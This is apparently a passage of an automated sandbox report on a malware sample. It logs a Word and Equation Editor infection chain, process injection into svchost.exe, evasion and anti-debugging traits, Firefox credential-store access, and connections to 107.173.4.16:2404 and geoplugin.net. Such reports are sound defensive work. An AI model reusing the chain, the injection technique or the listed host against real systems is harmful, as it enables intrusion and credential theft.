Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0040F7E2 Sleep,ExitProcess,

7_2_0040F7E2

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\directory\name.exe	API/Special instruction interceptor: Address: 5E3244
Source: C:\Users\user\AppData\Local\directory\name.exe	API/Special instruction interceptor: Address: 133244

Source: C:\Windows\SysWOW64\svchost.exe

Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,

7_2_0041A7D9

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Window / User API: threadDelayed 9813

Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\user\AppData\Local\directory\name.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	API coverage: 6.3 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.9 %

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3404	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604	Thread sleep count: 164 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604	Thread sleep time: -492000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3656	Thread sleep time: -120000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604	Thread sleep count: 9813 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3604	Thread sleep time: -29439000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 3776	Thread sleep time: -60000s >= -30000s	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3940	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D5449B GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00D5449B
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D5C7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	5_2_00D5C7E8
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D5C75D FindFirstFileW,FindClose,	5_2_00D5C75D
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D5F021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00D5F021
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D5F17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	5_2_00D5F17E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013F449B GetFileAttributesW,FindFirstFileW,FindClose,	6_2_013F449B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FC75D FindFirstFileW,FindClose,	6_2_013FC75D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	6_2_013FC7E8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_013FF17E
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	6_2_013FF021
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_013FF47F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013F3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_013F3833
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013F3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	6_2_013F3B56
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013FBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	6_2_013FBD48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_0040928E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	7_2_0041C322
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	7_2_0040C388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	7_2_004096A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	7_2_00408847
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00407877 FindFirstFileW,FindNextFileW,	7_2_00407877
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0044E8F9 FindFirstFileExA,	7_2_0044E8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	7_2_0040BB6B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW,	7_2_00419B86
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	7_2_0040BD72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_100010F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	7_2_100010F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10006580 FindFirstFileExA,	7_2_10006580

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_00407CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

7_2_00407CD2

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00CF4AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00CF4AFE

Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\	Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	API call chain: ExitProcess graph end node	graph_5-60950
Source: C:\Users\user\AppData\Local\directory\name.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\directory\name.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\svchost.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D6401F BlockInput,

5_2_00D6401F

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00CF3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

5_2_00CF3B4C

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 6_2_013C5BFC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

6_2_013C5BFC

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D6C104 LoadLibraryA,GetProcAddress,

5_2_00D6C104

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_00683FF2 mov edx, dword ptr fs:[00000030h]	2_2_00683FF2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_005E34B0 mov eax, dword ptr fs:[00000030h]	6_2_005E34B0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_005E3510 mov eax, dword ptr fs:[00000030h]	6_2_005E3510
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_005E1E70 mov eax, dword ptr fs:[00000030h]	6_2_005E1E70
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00443355 mov eax, dword ptr fs:[00000030h]	7_2_00443355
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10004AB4 mov eax, dword ptr fs:[00000030h]	7_2_10004AB4

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D481D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

5_2_00D481D4

Source: C:\Windows\SysWOW64\svchost.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D1A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00D1A2D5
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Code function: 5_2_00D1A2A4 SetUnhandledExceptionFilter,	5_2_00D1A2A4
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013BA2A4 SetUnhandledExceptionFilter,	6_2_013BA2A4
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 6_2_013BA2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_013BA2D5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00434BD8 SetUnhandledExceptionFilter,	7_2_00434BD8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043503C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_0043503C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_00434A8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_00434A8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_0043BB71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_0043BB71
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_100060E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_10002B1C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 7_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_10002639

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe	Domain query: geoplugin.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 107.173.4.16 2404	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.237.33.50 80	Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Windows\SysWOW64\svchost.exe

Code function: 7_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

7_2_0041812A

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008			Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 7EFDE008			Jump to behavior

Source: C:\Windows\SysWOW64\svchost.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

7_2_00412132

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D48A73 LogonUserW,

5_2_00D48A73

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00CF3B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

5_2_00CF3B4C

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00CF4A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,

5_2_00CF4A35

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D54CCE mouse_event,

5_2_00D54CCE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\taskhostw.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\taskhostw.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Roaming\taskhostw.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\siqmroydgnmmmfpuczimwafbeumewarjhx"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ckvxrh"	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\feapszuyi"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\directory\name.exe"	Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

5_2_00D481D4

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D54A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

5_2_00D54A08

Source: taskhostw.exe, 00000005.00000000.358584246.0000000000DA4000.00000002.00000001.01000000.00000005.sdmp, taskhostw.exe, 00000005.00000003.362011694.0000000002B33000.00000004.00001000.00020000.00000000.sdmp, name.exe, 00000006.00000000.362092818.0000000001444000.00000002.00000001.01000000.00000006.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: taskhostw.exe, name.exe	Binary or memory string: Shell_TrayWnd
Source: svchost.exe, 00000007.00000002.854766910.0000000000234000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_3_02AA7BAB cpuid

5_3_02AA7BAB

Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	7_2_0045201B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	7_2_004520B6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	7_2_00452143
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	7_2_00452393
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	7_2_00448484
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_004524BC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	7_2_004525C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_00452690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoW,	7_2_0044896D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: GetLocaleInfoA,	7_2_0040F90C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: IsValidCodePage,GetLocaleInfoW,	7_2_00451D58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: EnumSystemLocalesW,	7_2_00451FD0

Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D25007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

5_2_00D25007

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D3215F GetUserNameW,

5_2_00D3215F

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

Code function: 5_2_00D240BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

5_2_00D240BA

Source: C:\Users\user\AppData\Roaming\taskhostw.exe

